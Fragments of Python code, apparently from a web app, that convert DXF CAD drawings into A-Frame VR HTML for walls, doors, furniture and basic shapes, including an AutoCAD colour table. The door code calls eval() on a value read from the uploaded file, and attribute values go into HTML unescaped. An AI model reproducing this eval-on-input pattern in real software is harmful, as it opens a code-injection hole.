id="{self.d['2']}-{self.d['num']}-slide-2" \n' outstr += f'position="{self.d['41']} 0 0"> \n' outstr += f'<a-animation attribute="position" from="{self.d['41']} 0 0" to="{(self.d['41'])*3/2} 0 0" begin="click" repeat="1" direction="alternate"></a-animation>' #moving part 2 outstr += f'<a-box id="{self.d['2']}-{self.d['num']}-moving-part-2" \n' outstr += f'position="{-self.d['41']/4} {(self.d['43']-0.001*unit(self.d['43']))/2} {-self.d['42']/2}" \n' outstr += f'scale="{(fabs(self.d['41']))/2-0.002} {self.d['43']-0.001*unit(self.d['43'])} 0.05" \n' outstr += f'material="src: #image-{self.d['8']}; color: {self.d['color']}' outstr += is_repeat(self.d["repeat"], (fabs(self.d["41"]))/2-0.002, self.d["43"]-0.001*unit(self.d["43"])) outstr += '"></a-box>\n' outstr += '</a-entity>\n' #end entity outstr += '</a-entity>\n' return outstr else:#single #animated slide outstr += f'<a-entity id="{self.d['2']}-{self.d['num']}-slide"> \n' outstr += f'<a-animation attribute="position" from="0 0 0" to="{-self.d['41']} 0 0" begin="click" repeat="1" direction="alternate"></a-animation>' #moving part outstr += f'<a-box id="{self.d['2']}-{self.d['num']}-moving-part" \n' outstr += f'position="{self.d['41']/2} {(self.d['43']-0.001*unit(self.d['43']))/2} {-self.d['42']/2}" \n' outstr += f'scale="{fabs(self.d['41'])-0.002} {self.d['43']-0.001*unit(self.d['43'])} 0.05" \n' outstr += f'material="src: #image-{self.d['8']}; color: {self.d['color']}' outstr += is_repeat(self.d["repeat"], fabs(self.d["41"])-0.002, self.d["43"]-0.001*unit(self.d["43"])) outstr += '"></a-box>\n' outstr += '</a-entity>\n' #end entity outstr += '</a-entity>\n' return outstr else:#hinged if eval(self.d["double"]): #animated hinge 1 outstr += f'<a-entity id="{self.d['2']}-{self.d['num']}-hinge-1"> \n' outstr += f'<a-animation attribute="rotation" from="0 0 0" to="0 {-90*unit(self.d['41'])*unit(self.d['42'])} 0" begin="click" repeat="1" direction="alternate"></a-animation>' #moving part 1 outstr += f'<a-box id="{self.d['2']}-{self.d['num']}-moving-part-1" \n' outstr += f'position="{self.d['41']/4} {(self.d['43']-0.001*unit(self.d['43']))/2} {-0.025*unit(self.d['42'])}" \n' outstr += f'scale="{(fabs(self.d['41']))/2-0.002} {self.d['43']-0.001*unit(self.d['43'])} 0.05" \n' outstr += f'material="src: #image-{self.d['8']}; color: {self.d['color']}' outstr += is_repeat(self.d["repeat"], (fabs(self.d["41"]))/2-0.002, self.d["43"]-0.001*unit(self.d["43"])) outstr += '"></a-box>\n' outstr += '</a-entity>\n' #animated hinge 2 outstr += f'<a-entity id="{self.d['2']}-{self.d['num']}-hinge-2" ' outstr += f'position="{self.d['41']} 0 0"> \n' outstr += f'<a-animation attribute="rotation" from="0 0 0" to="0 {90*unit(self.d['41'])*unit(self.d['42'])} 0" begin="click" repeat="1" direction="alternate"></a-animation>' #moving part 2 outstr += f'<a-box id="{self.d['2']}-{self.d['num']}-moving-part-2" \n' outstr += f'position="{-self.d['41']/4} {(self.d['43']-0.001*unit(self.d['43']))/2} {-0.025*unit(self.d['42'])}" \n' outstr += f'scale="{(fabs(self.d['41']))/2-0.002} {self.d['43']-0.001*unit(self.d['43'])} 0.05" \n' outstr += f'material="src: #image-{self.d['8']}; color: {self.d['color']}' outstr += is_repeat(self.d["repeat"], (fabs(self.d["41"]))/2-0.002, self.d["43"]-0.001*unit(self.d["43"])) outstr += '"></a-box>\n' outstr += '</a-entity>\n' #end entity outstr += '</a-entity>\n' return outstr else:#single #animated hinge outstr += f'<a-entity id="{self.d['2']}-{self.d['num']}-hinge"> \n' outstr += f'<a-animation attribute="rotation" from="0 0 0" to="0 {-90*unit(self.d['41'])*unit(self.d['42'])} 0" begin="click" repeat="1" direction="alternate"></a-animation>' #moving part outstr += f'<a-box id="{self.d['2']}-{self.d['num']}-moving-part" \n' outstr += f'position="{self.d['41']/2} {(self.d['43']-0.001*unit(self.d['43']))/2} {-0.025*unit(self.d['42'])}" \n' outstr += f'scale="{fabs(self.d['41'])-0.002} {self.d['43']-0.001*unit(self.d['43'])} 0.05" \n' outstr += f'material="src: #image-{self.d['8']}; color: {self.d['color']}' outstr += is_repeat(self.d["repeat"], fabs(self.d["41"])-0.002, self.d["43"]-0.001*unit(self.d["43"])) outstr += '"></a-box>\n' outstr += '</a-entity>\n' #end entity outstr += '</a-entity>\n' return outstr class AFurniture(object): def __init__(self, page_obj, data, finishings): self.d = data#is it possible to use the self.__dict__=data construct? it would be much cleaner self.page_obj = page_obj.specific #dummy values self.d['tiling_image'] = self.d['8'] self.d['tiling_repeat'] = self.d['repeat'] self.d['tiling_color'] = self.d['color'] self.d['skirting_image'] = self.d['8'] self.d['skirting_repeat'] = self.d['repeat'] self.d['skirting_color'] = self.d['color'] #looks for finishing self.finish_obj = False if self.d['FINISHING']: try: self.finish_obj = finishings.get(title = self.d['FINISHING']) except: pass def has_finishing(self): #we change appearance according to finishing if self.finish_obj.image: self.d['8'] = self.finish_obj.title self.d['repeat'] = self.finish_obj.pattern if self.finish_obj.color: self.d['color'] = self.finish_obj.color if self.finish_obj.tiling_image: self.d['tiling_image'] = 'tiling-' + self.finish_obj.title self.d['tiling_repeat'] = self.finish_obj.tiling_pattern if self.finish_obj.tiling_color: self.d['tiling_color'] = self.finish_obj.tiling_color if self.finish_obj.skirting_image: self.d['skirting_image'] = 'skirting-' + self.finish_obj.title self.d['skirting_repeat'] = self.finish_obj.skirting_pattern if self.finish_obj.skirting_color: self.d['skirting_color'] = self.finish_obj.skirting_color return def no_finishing(self): #dummy values self.d['tiling_image'] = self.d['8'] self.d['tiling_repeat'] = self.d['repeat'] self.d['tiling_color'] = self.d['color'] self.d['skirting_image'] = self.d['8'] self.d['skirting_repeat'] = self.d['repeat'] self.d['skirting_color'] = self.d['color'] return def write_html(self): if self.d['type'] == 't01': output = self.make_table_01() #elif of other furniture else:#in the end it draws a table! output = self.make_table_01() return output def make_table_01(self): #start entity outstr = f'<a-entity id="{self.d['2']}-{self.d['num']}" \n' if self.page_obj.shadows: outstr += 'shadow="receive: true; cast: true" \n' outstr += f'position="{self.d['10']} {self.d['30']} {self.d['20']}" \n' outstr += f'rotation="{self.d['210']} {self.d['50']} {self.d['220']}">\n' #table top outstr += f'<a-box id="{self.d['2']}-{self.d['num']}-table-top" \n' outstr += f'position="{self.d['41']/2} {self.d['43']-0.025*unit(self.d['43'])} {-self.d['42']/2}" \n' outstr += f'scale="{fabs(self.d['41'])} 0.05 {fabs(self.d['42'])}" \n' outstr += f'material="src: #image-{self.d['tiling_image']}; color: {self.d['tiling_color']} ' outstr += is_repeat(self.d["tiling_repeat"], fabs(self.d["41"]), fabs(self.d["42"])) outstr += '"></a-box>\n' self.leg = self.d["43"]-0.025*unit(self.d["43"]) #first leg outstr += f'<a-cylinder id="{self.d['2']}-{self.d['num']}-leg-1" \n' outstr += f'position="{0.05*unit(self.d['41'])} {self.leg/2} {-0.05*unit(self.d['42'])}" \n' outstr += self.close_leg() #second leg outstr += f'<a-cylinder id="{self.d['2']}-{self.d['num']}-leg-2" \n' outstr += f'position="{self.d['41']-0.05*unit(self.d['41'])} {self.leg/2} {-0.05*unit(self.d['42'])}" \n' outstr += self.close_leg() #third leg outstr += f'<a-cylinder id="{self.d['2']}-{self.d['num']}-leg-3" \n' outstr += f'position="{0.05*unit(self.d['41'])} {self.leg/2} {-self.d['42']+0.05*unit(self.d['42'])}" \n' outstr += self.close_leg() #fourth leg outstr += f'<a-cylinder id="{self.d['2']}-{self.d['num']}-leg-4" \n' outstr += f'position="{self.d['41']-0.05*unit(self.d['41'])} {self.leg/2} {-self.d['42']+0.05*unit(self.d['42'])}" \n' outstr += self.close_leg() #close entity outstr += '</a-entity>\n' return outstr def close_leg(self): outstr = 'radius="0.025" \n' outstr += f'height="{self.leg}" \n' outstr += f'material="src: #image-{self.d['skirting_image']}; color: {self.d['skirting_color']} ' outstr += '"></a-cylinder>\n' return outstr def cad2hex(cad_color): cad_color = abs(int(cad_color)) if cad_color<0 or cad_color>255: return 'white' else: RGB_list = ( (0, 0, 0), (255, 0, 0), (255, 255, 0), (0, 255, 0), (0, 255, 255), (0, 0, 255), (255, 0, 255), (255, 255, 255), (128, 128, 128), (192, 192, 192), (255, 0, 0), (255, 127, 127), (165, 0, 0), (165, 82, 82), (127, 0, 0), (127, 63, 63), (76, 0, 0), (76, 38, 38), (38, 0, 0), (38, 19, 19), (255, 63, 0), (255, 159, 127), (165, 41, 0), (165, 103, 82), (127, 31, 0), (127, 79, 63), (76, 19, 0), (76, 47, 38), (38, 9, 0), (38, 23, 19), (255, 127, 0), (255, 191, 127), (165, 82, 0), (165, 124, 82), (127, 63, 0), (127, 95, 63), (76, 38, 0), (76, 57, 38), (38, 19, 0), (38, 28, 19), (255, 191, 0), (255, 223, 127), (165, 124, 0), (165, 145, 82), (127, 95, 0), (127, 111, 63), (76, 57, 0), (76, 66, 38), (38, 28, 0), (38, 33, 19), (255, 255, 0), (255, 255, 127), (165, 165, 0), (165, 165, 82), (127, 127, 0), (127, 127, 63), (76, 76, 0), (76, 76, 38), (38, 38, 0), (38, 38, 19), (191, 255, 0), (223, 255, 127), (124, 165, 0), (145, 165, 82), (95, 127, 0), (111, 127, 63), (57, 76, 0), (66, 76, 38), (28, 38, 0), (33, 38, 19), (127, 255, 0), (191, 255, 127), (82, 165, 0), (124, 165, 82), (63, 127, 0), (95, 127, 63), (38, 76, 0), (57, 76, 38), (19, 38, 0), (28, 38, 19), (63, 255, 0), (159, 255, 127), (41, 165, 0), (103, 165, 82), (31, 127, 0), (79, 127, 63), (19, 76, 0), (47, 76, 38), (9, 38, 0), (23, 38, 19), (0, 255, 0), (127, 255, 127), (0, 165, 0), (82, 165, 82), (0, 127, 0), (63, 127, 63), (0, 76, 0), (38, 76, 38), (0, 38, 0), (19, 38, 19), (0, 255, 63), (127, 255, 159), (0, 165, 41), (82, 165, 103), (0, 127, 31), (63, 127, 79), (0, 76, 19), (38, 76, 47), (0, 38, 9), (19, 38, 23), (0, 255, 127), (127, 255, 191), (0, 165, 82), (82, 165, 124), (0, 127, 63), (63, 127, 95), (0, 76, 38), (38, 76, 57), (0, 38, 19), (19, 38, 28), (0, 255, 191), (127, 255, 223), (0, 165, 124), (82, 165, 145), (0, 127, 95), (63, 127, 111), (0, 76, 57), (38, 76, 66), (0, 38, 28), (19, 38, 33), (0, 255, 255), (127, 255, 255), (0, 165, 165), (82, 165, 165), (0, 127, 127), (63, 127, 127), (0, 76, 76), (38, 76, 76), (0, 38, 38), (19, 38, 38), (0, 191, 255), (127, 223, 255), (0, 124, 165), (82, 145, 165), (0, 95, 127), (63, 111, 127), (0, 57, 76), (38, 66, 76), (0, 28, 38), (19, 33, 38), (0, 127, 255), (127, 191, 255), (0, 82, 165), (82, 124, 165), (0, 63, 127), (63, 95, 127), (0, 38, 76), (38, 57, 76), (0, 19, 38), (19, 28, 38), (0, 63, 255), (127, 159, 255), (0, 41, 165), (82, 103, 165), (0, 31, 127), (63, 79, 127), (0, 19, 76), (38, 47, 76), (0, 9, 38), (19, 23, 38), (0, 0, 255), (127, 127, 255), (0, 0, 165), (82, 82, 165), (0, 0, 127), (63, 63, 127), (0, 0, 76), (38, 38, 76), (0, 0, 38), (19, 19, 38), (63, 0, 255), (159, 127, 255), (41, 0, 165), (103, 82, 165), (31, 0, 127), (79, 63, 127), (19, 0, 76), (47, 38, 76), (9, 0, 38), (23, 19, 38), (127, 0, 255), (191, 127, 255), (82, 0, 165), (124, 82, 165), (63, 0, 127), (95, 63, 127), (38, 0, 76), (57, 38, 76), (19, 0, 38), (28, 19, 38), (191, 0, 255), (223, 127, 255), (124, 0, 165), (145, 82, 165), (95, 0, 127), (111, 63, 127), (57, 0, 76), (66, 38, 76), (28, 0, 38), (33, 19, 38), (255, 0, 255), (255, 127, 255), (165, 0, 165), (165, 82, 165), (127, 0, 127), (127, 63, 127), (76, 0, 76), (76, 38, 76), (38, 0, 38), (38, 19, 38), (255, 0, 191), (255, 127, 223), (165, 0, 124), (165, 82, 145), (127, 0, 95), (127, 63, 111), (76, 0, 57), (76, 38, 66), (38, 0, 28), (38, 19, 33), (255, 0, 127), (255, 127, 191), (165, 0, 82), (165, 82, 124), (127, 0, 63), (127, 63, 95), (76, 0, 38), (76, 38, 57), (38, 0, 19), (38, 19, 28), (255, 0, 63), (255, 127, 159), (165, 0, 41), (165, 82, 103), (127, 0, 31), (127, 63, 79), (76, 0, 19), (76, 38, 47), (38, 0, 9), (38, 19, 23), (0, 0, 0), (51, 51, 51), (102, 102, 102), (153, 153, 153), (204, 204, 204), (255, 255, 255), ) r = RGB_list[cad_color][0] g = RGB_list[cad_color][1] b = RGB_list[cad_color][2] hex = "#{:02x}{:02x}{:02x}".format(r,g,b) return hex
from math import radians, sin, cos, asin, degrees, pi, sqrt, pow, fabs, atan2 def parse_dxf(dxf_f, material_gallery): output = {} layer_color = {} flag = False x = 0 value = 'dummy' while value !='ENTITIES': key = dxf_f.readline().strip() value = dxf_f.readline().strip() if value == 'AcDbLayerTableRecord':#dict of layer names and colors key = dxf_f.readline().strip() layer_name = dxf_f.readline().strip() key = dxf_f.readline().strip() value = dxf_f.readline().strip() key = dxf_f.readline().strip() layer_color[layer_name] = cad2hex(dxf_f.readline().strip()) elif value=='EOF' or key=='':#security to avoid loops if file is corrupted return output while value !='ENDSEC': key = dxf_f.readline().strip() value = dxf_f.readline().strip() if value=='EOF' or key=='':#security to avoid loops if file is corrupted return output if flag == 'face':#stores values for 3D faces if key == '8':#layer name data[key] = value elif key == '10' or key == '11' or key == '12' or key == '13':#X position data[key] = float(value) elif key == '20' or key == '21' or key == '22' or key == '23':#mirror Y position data[key] = -float(value) elif key == '30' or key == '31' or key == '32' or key == '33':#Z position data[key] = float(value) elif flag == 'block':#stores values for blocks if key == '2':#block name data[key] = value if key == '8':#layer name data[key] = value data['layer'] = value#sometimes key 8 is replaced, so I need the original layer value elif key == '10' or key == '30':#X Z position data[key] = float(value) elif key == '20':#Y position, mirrored data[key] = -float(value) elif key == '50':#Z rotation data[key] = float(value) elif key == '41' or key == '42' or key == '43':#scale values data[key] = float(value) elif key == '210':#X of OCS unitary vector Az_1 = float(value) P_x = data['10'] elif key == '220':#Y of OCS unitary vector Az_2 = float(value) P_y = -data['20']#reset original value elif key == '230':#Z of OCS unitary vector Az_3 = float(value) P_z = data['30'] #arbitrary axis algorithm #see if OCS z vector is close to world Z axis if fabs(Az_1) < (1/64) and fabs(Az_2) < (1/64): W = ('Y', 0, 1, 0) else: W = ('Z', 0, 0, 1) #cross product for OCS x arbitrary vector, normalized Ax_1 = W[2]*Az_3-W[3]*Az_2 Ax_2 = W[3]*Az_1-W[1]*Az_3 Ax_3 = W[1]*Az_2-W[2]*Az_1 Norm = sqrt(pow(Ax_1, 2)+pow(Ax_2, 2)+pow(Ax_3, 2)) Ax_1 = Ax_1/Norm Ax_2 = Ax_2/Norm Ax_3 = Ax_3/Norm #cross product for OCS y arbitrary vector, normalized Ay_1 = Az_2*Ax_3-Az_3*Ax_2 Ay_2 = Az_3*Ax_1-Az_1*Ax_3 Ay_3 = Az_1*Ax_2-Az_2*Ax_1 Norm = sqrt(pow(Ay_1, 2)+pow(Ay_2, 2)+pow(Ay_3, 2)) Ay_1 = Ay_1/Norm Ay_2 = Ay_2/Norm Ay_3 = Ay_3/Norm #insertion world coordinates from OCS data['10'] = P_x*Ax_1+P_y*Ay_1+P_z*Az_1 data['20'] = P_x*Ax_2+P_y*Ay_2+P_z*Az_2 data['30'] = P_x*Ax_3+P_y*Ay_3+P_z*Az_3 #OCS X vector translated into WCS Ax_1 = ((P_x+cos(radians(data['50'])))*Ax_1+(P_y+sin(radians(data['50'])))*Ay_1+P_z*Az_1)-data['10'] Ax_2 = ((P_x+cos(radians(data['50'])))*Ax_2+(P_y+sin(radians(data['50'])))*Ay_2+P_z*Az_2)-data['20'] Ax_3 = ((P_x+cos(radians(data['50'])))*Ax_3+(P_y+sin(radians(data['50'])))*Ay_3+P_z*Az_3)-data['30'] #cross product for OCS y vector, normalized Ay_1 = Az_2*Ax_3-Az_3*Ax_2 Ay_2 = Az_3*Ax_1-Az_1*Ax_3 Ay_3 = Az_1*Ax_2-Az_2*Ax_1 Norm = sqrt(pow(Ay_1, 2)+pow(Ay_2, 2)+pow(Ay_3, 2)) Ay_1 = Ay_1/Norm Ay_2 = Ay_2/Norm Ay_3 = Ay_3/Norm #A-Frame rotation order is Yaw(Z), Pitch(X) and Roll(Y) #thanks for help Marilena Vendittelli and https://www.geometrictools.com/ if Ay_3<1: if Ay_3>-1: pitch = asin(Ay_3) yaw = atan2(-Ay_1, Ay_2) roll = atan2(-Ax_3, Az_3) else: pitch = -pi/2 yaw = -atan2(Az_1, Ax_1) roll = 0 else: pitch = pi/2 yaw = atan2(Az_1, Ax_1) roll = 0 #Y position, mirrored data['20'] = -data['20'] #rotations from radians to degrees data['210'] = degrees(pitch) data['50'] = degrees(yaw) data['220'] = -degrees(roll) elif flag == 'attrib':#stores values for attributes within block if key == '1':#attribute value attr_value = value elif key == '2':#attribute key data[value] = attr_value flag = 'block'#restore block modality if key == '0': invisible = False#by default layer is visible if flag == 'face':#close 3D face data['2'] = '3dface' #is material set in model? try: material = material_gallery.get(layer = data['8']) data['color'] = material.color invisible = material.invisible#layer visibility except: data['color'] = layer_color[data['8']] data['8'] = 'default' if invisible: flag = False else: data['num'] = x output[x] = data if data['12']!=data['13'] or data['22']!=data['23'] or data['32']!=data['33']: data2 = data.copy() data2['11'] = data['12'] data2['21'] = data['22'] data2['31'] = data['32'] data2['12'] = data['13'] data2['22'] = data['23'] data2['32'] = data['33'] x += 1 data2['num'] = x output[x] = data2 flag = False elif value == 'ATTRIB':#start attribute within block attr_value = '' flag = 'attrib' elif flag == 'block':#close block #material images are patterns? is material set in model? try: material = material_gallery.get(layer = data['8']) data['color'] = material.color invisible = material.invisible#layer visibility if material.pattern:# == True data['repeat']=True except: data['color'] = layer_color[data['8']] data['8'] = 'default' if invisible: flag = False else: data['num'] = x output[x] = data flag = False if value == '3DFACE':#start 3D face data = {}#default values flag = 'face' x += 1 elif value == 'INSERT':#start block data = {'41': 1, '42': 1, '43': 1, '50': 0, '210': 0, '220': 0, '230': 1,'repeat': False, 'type': '','animation': False}#default values flag = 'block' x += 1 return output def make_html(page_obj, collection, partitions, finishings, csv_f): output = {} for x, data in collection.items(): if data['2'] == '3dface': output[x] = make_triangle(page_obj, x, data) if data['2'] == '6planes':#left for legacy output[x] = make_box(page_obj, x, data) elif data['2'] == 'box' or data['2'] == 'a-box': output[x] = make_box(page_obj, x, data) elif data['2'] == 'cylinder' or data['2'] == 'a-cylinder': output[x] = make_cylinder(page_obj, x, data) elif data['2'] == 'a-curvedimage': output[x] = make_curvedimage(x, data) elif data['2'] == 'cone' or data['2'] == 'a-cone': output[x] = make_cone(page_obj, x, data) elif data['2'] == 'sphere' or data['2'] == 'a-sphere': output[x] = make_sphere(page_obj, x, data) elif data['2'] == 'circle' or data['2'] == 'a-circle': output[x] = make_circle(page_obj, x, data) elif data['2'] == 'plane' or data['2'] == 'a-plane' or data['2'] == 'look-at': output[x] = make_plane(page_obj, x, data) elif data['2'] == 'floor':#left for legacy data['210'] = data['210'] - 90 output[x] = make_plane(page_obj, x, data) elif data['2'] == 'ceiling':#left for legacy data['210'] = data['210'] + 90 output[x] = make_plane(page_obj, x, data) elif data['2'] == 'light' or data['2'] == 'a-light': output[x] = make_light(page_obj, x, data) elif data['2'] == 'a-text': output[x] = make_text(x, data) elif data['2'] == 'a-link': output[x] = make_link(page_obj, x, data) elif data['2'] == 'a-door': door = AOpening(page_obj, data, partitions, finishings, csv_f) if door.type_obj: door.has_type()#changes colors and writes to csv else: door.no_type()#writes to csv if door.finish_obj: door.has_finishing()#changes colors again if door.d['alert'] == 'None': output[x] = door.write_html() else:#by now useless, if is always true pass #output[x] = door.write_html_alert() elif data['2'] == 'a-furniture': furn = AFurniture(page_obj, data, finishings) if furn.finish_obj: furn.has_finishing()#changes colors output[x] = furn.write_html() elif data['2'] == 'a-wall' or data['2'] == 'a-slab' or data['2'] == 'a-openwall': part = APartition(page_obj, data, partitions, finishings, csv_f) if part.type_obj: part.calc_weight() else: part.no_weight() #here we could add the has_finishing, as in AOpening if part.d['alert'] == 'None': output[x] = part.write_html() else: output[x] = part.write_html_alert() return output def reference_openings(collection): collection2 = collection.copy() for x, data in collection.items(): if data['2'] == 'a-door': collection[x] = data for x2, data2 in collection2.items(): if data2['2'] == 'a-wall': if data['210']==0 and data['220']==0 and data2['210']==0 and data2['220']==0: data2 = door_straight_case(x, data, data2) else: data2 = door_tilted_case(x, data, data2) collection[x2] = data2 return collection def reference_animations(collection):#TODO collection2 = collection.copy() for x, data in collection.items(): if data['2'] == 'a-animation': collection[x] = data for x2, data2 in collection2.items(): if data2['2'] != '3dface' or data2['2'] != 'a-wall' or data2['2'] != 'a-openwall' or data2['2'] != 'a-door': if data['10']==data2['10'] and data['20']==data2['20'] and data['30']==data2['30']: data2['animation'] = True data2['ATTRIBUTE'] = data['ATTRIBUTE'] data2['FROM'] = data['FROM'] data2['TO'] = data['TO'] data2['BEGIN'] = data['BEGIN'] data2['DIRECTION'] = data['DIRECTION'] data2['REPEAT'] = data['REPEAT'] data2['DURATION'] = data['DURATION'] collection[x2] = data2 return collection def door_straight_case(x, data, data2): if data['30']==data2['30'] and data['43']>0 and data2['43']>0: rotd = round(data['50'], 0) rotw = round(data2['50'], 0) if rotd==rotw-180 or rotd-180==rotw: backwards = -1 else: backwards = 1 if rotd == rotw or backwards == -1: #translation xt = data['10']-data2['10'] zt = data['20']-data2['20'] #rotation alfa = radians(data2['50']) xd = round(xt*cos(alfa)-zt*sin(alfa), 4) zd = round(xt*sin(alfa)+zt*cos(alfa), 4) xde = xd + round(data['41'], 4)*backwards zde = zd + round(data['42'], 4) #wall bounding box if data2['41'] > 0: xmaxw = round(data2['41'], 4) xminw = 0 else: xmaxw = 0 xminw = round(data2['41'], 4) if data2['42'] > 0: zmaxw = 0 zminw = -round(data2['42'], 4) else: zmaxw = -round(data2['42'], 4) zminw = 0 #door bounding box if xde > xd: xmaxd = xde xmind = xd else: xmaxd = xd xmind = xde if zde > zd: zmaxd = zde * ( - backwards) zmind = zd * ( - backwards) else: zmaxd = zd * ( - backwards) zmind = zde * ( - backwards) #door inclusion if xmaxw >= xmaxd and xminw <= xmind and zmaxw >= zmaxd and zminw <= zmind: data2['door'] = x data2['2'] = 'a-openwall' if data['43']>data2['43']: data2['door_height'] = data2['43'] else: data2['door_height'] = data['43'] if data2['41']>0: data2['door_off_1'] = xmind data2['door_off_2'] = xmaxd else: data2['door_off_1'] = xmaxd - xmaxw data2['door_off_2'] = xmind - xmaxw return data2 #TODO def door_tilted_case(x, data, data2): #d210 = round(data['210']*fabs(data['41'])/data['41'], 4) #d220 = round(data['220']*fabs(data['42'])/data['42'], 4) #d50 = round(data['50']*fabs(data['43'])/data['43'], 4) #w210 = round(data2['210']*fabs(data2['41'])/data2['41'], 4) #w220 = round(data2['220']*fabs(data2['42'])/data2['42'], 4) #w50 = round(data2['50']*fabs(data2['43'])/data2['43'], 4) return data2 #returns repeat image values def is_repeat(repeat, rx, ry): if repeat: output = f'; repeat:{fabs(rx)} {fabs(ry)}' return output else: return ';' #returns positive/negative scaling def unit(nounit): unit = fabs(nounit)/nounit return unit def make_box(page_obj, x, data): outstr = f'<a-entity id="box-{x}-ent" \n' if page_obj.shadows: outstr += 'shadow="receive: true; cast: true" \n' outstr += f'position="{data["10"]} {data["30"]} {data["20"]}" \n' outstr += f'rotation="{data["210"]} {data["50"]} {data["220"]}">\n' outstr += f'<a-box id="box-{x}" \n' outstr += f'position="{data["41"]/2} {data["43"]/2} {-data["42"]/2}" \n' outstr += f'scale="{fabs(data["41"])} {fabs(data["43"])} {fabs(data["42"])}" \n' outstr += 'geometry="' try: if data['segments-depth']!='1': outstr += f'segments-depth: {data["segments-depth"]};' if data['segments-height']!='1': outstr += f'segments-height: {data["segments-height"]};' if data['segments-width']!='1': outstr += f'segments-width: {data["segments-width"]};' outstr += '" \n' except KeyError: outstr += '" \n' outstr += f'material="src: #image-{data["8"]}; color: {data["color"]}' outstr += is_repeat(data["repeat"], data["41"], data["43"]) outstr += '">\n' if data['animation']: outstr += is_animation(data) outstr += '</a-box>\n</a-entity>\n' return outstr def is_animation(data): outstr = f'<a-animation attribute="{data["ATTRIBUTE"]}"\n' outstr += f'from="{data["FROM"]}"\n' outstr += f'to="{data["TO"]}"\n' outstr += f'begin="{data["BEGIN"]}"\n' outstr += f'direction="{data["DIRECTION"]}"\n' outstr += f'repeat="{data["REPEAT"]}"\n' outstr += f'duration="{data["DURATION"]}"\n' outstr += '></a-animation>\n' return outstr def make_cone(page_obj, x, data): outstr = f'<a-entity id="cone-{x}-ent" \n' if page_obj.shadows: outstr += 'shadow="receive: true; cast: true" \n' outstr += f'position="{data["10"]} {data["30"]} {data["20"]}" \n' outstr += f'rotation="{data["210"]} {data["50"]} {data["220"]}">\n' outstr += f'<a-cone id="cone-{x}" \n' outstr += f'position="0 {data["43"]/2} 0" \n' if float(data['43']) < 0: outstr += 'rotation="180 0 0">\n' outstr += f'scale="{fabs(data["41"])} {fabs(data["43"])} {fabs(data["42"])}" \n' outstr += 'geometry="' try: if data['open-ended']!='false': outstr += 'open-ended: true;' if data['radius-top']!='0': outstr += f'radius-top: {data["radius-top"]};' if data['segments-height']!='18': outstr += f'segments-height: {data["segments-height"]};' if data['segments-radial']!='36': outstr += f'segments-radial: {data["segments-radial"]};' if data['theta-length']!='360': outstr += f'theta-length: {data["theta-length"]};' if data['theta-start']!='0': outstr += f'theta-start: {data["theta-start"]};' outstr += '" \n' except KeyError: outstr += '" \n' outstr += f'material="src: #image-{data["8"]}; color: {data["color"]}' outstr += is_repeat(data["repeat"], data["41"], data["43"]) outstr += '">\n' if data['animation']: outstr += is_animation(data) outstr += '</a-cone>\n</a-entity>\n' return outstr def make_circle(page_obj, x, data): outstr = f'<a-entity id="circle-{x}-ent" \n' if page_obj.shadows: outstr += 'shadow="receive: true; cast: true" \n' outstr += f'position="{data["10"]} {data["30"]} {data["20"]}" \n' outstr += f'rotation="{data["210"]} {data["50"]} {data["220"]}">\n' outstr += f'<a-circle id="circle-{x}" \n' if data['2'] == 'circle': outstr += f'rotation="-90 0 0"\n' outstr += f'radius="{fabs(data["41"])}" \n' outstr += 'geometry="' try: if data['segments']!='32': outstr += f'segments: {data["segments"]};' if data['theta-length']!='360': outstr += f'theta-length: {data["theta-length"]};' if data['theta-start']!='0': outstr += f'theta-start: {data["theta-start"]};' outstr += '" \n' except KeyError: outstr += '" \n' outstr += f'material="src: #image-{data["8"]}; color: {data["color"]}' outstr += is_repeat(data["repeat"], data["41"], data["43"]) outstr += '">\n' if data['animation']: outstr += is_animation(data) outstr += '</a-circle>\n</a-entity>\n' return outstr def make_cylinder(page_obj, x, data): outstr = f'<a-entity id="cylinder-{x}-ent" \n' if page_obj.shadows: outstr += 'shadow="receive: true; cast: true" \n' outstr += f'position="{data["10"]} {data["30"]} {data["20"]}" \n' outstr += f'rotation="{data["210"]} {data["50"]} {data["220"]}">\n' outstr += f'<a-cylinder id="cylinder-{x}" \n' outstr += f'position="0 {data["43"]/2} 0" \n' if float(data['43']) < 0: outstr += 'rotation="180 0 0">\n' outstr += f'scale="{fabs(data["41"])} {fabs(data["43"])} {fabs(data["42"])}" \n' outstr += 'geometry="' try: if data['open-ended']!='false': outstr += 'open-ended: true;' if data['radius-top']!='0': outstr += f'radius-top: {data["radius-top"]};' if data['segments-height']!='18': outstr += f'segments-height: {data["segments-height"]};' if data['segments-radial']!='36': outstr += f'segments-radial: {data["segments-radial"]};' if data['theta-length']!='360': outstr += f'theta-length: {data["theta-length"]};' if data['theta-start']!='0': outstr += f'theta-start: {data["theta-start"]};' outstr += '" \n' except KeyError: outstr += '" \n' outstr += f'material="src: #image-{data["8"]}; color: {data["color"]}' outstr += is_repeat(data["repeat"], data["41"], data["43"]) outstr += '">\n' if data['animation']: outstr += is_animation(data) outstr += '</a-cylinder>\n</a-entity>\n' return outstr def make_curvedimage(x, data): outstr = f'<a-entity id="curvedimage-{x}-ent" \n' outstr += 'shadow="receive: false; cast: false" \n' outstr += f'position="{data["10"]} {data["30"]} {data["20"]}" \n' outstr += f'rotation="{data["210"]} {data["50"]} {data["220"]}">\n' outstr += f'<a-curvedimage id="curvedimage-{x}" \n' outstr += f'position="0 {data["43"]/2} 0" \n' if float(data['43']) < 0: outstr += 'rotation="180 0 0">\n' outstr += f'scale="{fabs(data["41"])} {fabs(data["43"])} {fabs(data["42"])}" \n' try: if data['theta-length']!='270': outstr += f'theta-length="{data["theta-length"]}" ' if data['theta-start']!='0': outstr += f'theta-start="{data["theta-start"]}" ' except KeyError: pass outstr += f'src="#image-{data["8"]}">\n' if data['animation']: outstr += is_animation(data) outstr += '</a-curvedimage>\n</a-entity>\n' return outstr def make_sphere(page_obj, x, data): outstr = f'<a-entity id="sphere-{x}-ent" \n' if page_obj.shadows: outstr += 'shadow="receive: true; cast: true" \n' outstr += f'position="{data["10"]} {data["30"]} {data["20"]}" \n' outstr += f'rotation="{data["210"]} {data["50"]} {data["220"]}">\n' outstr += f'<a-sphere id="sphere-{x}" \n' outstr += f'position="0 {data["43"]} 0" \n' if float(data['43']) < 0: outstr += 'rotation="180 0 0">\n' outstr += f'scale="{fabs(data["41"])} {fabs(data["43"])} {fabs(data["42"])}" \n' outstr += 'geometry="' try: if data['phi-length']!='360': outstr += f'phi-length: {data["phi-length"]};' if data['phi-start']!='0': outstr += f'phi-start: {data["phi-start"]};' if 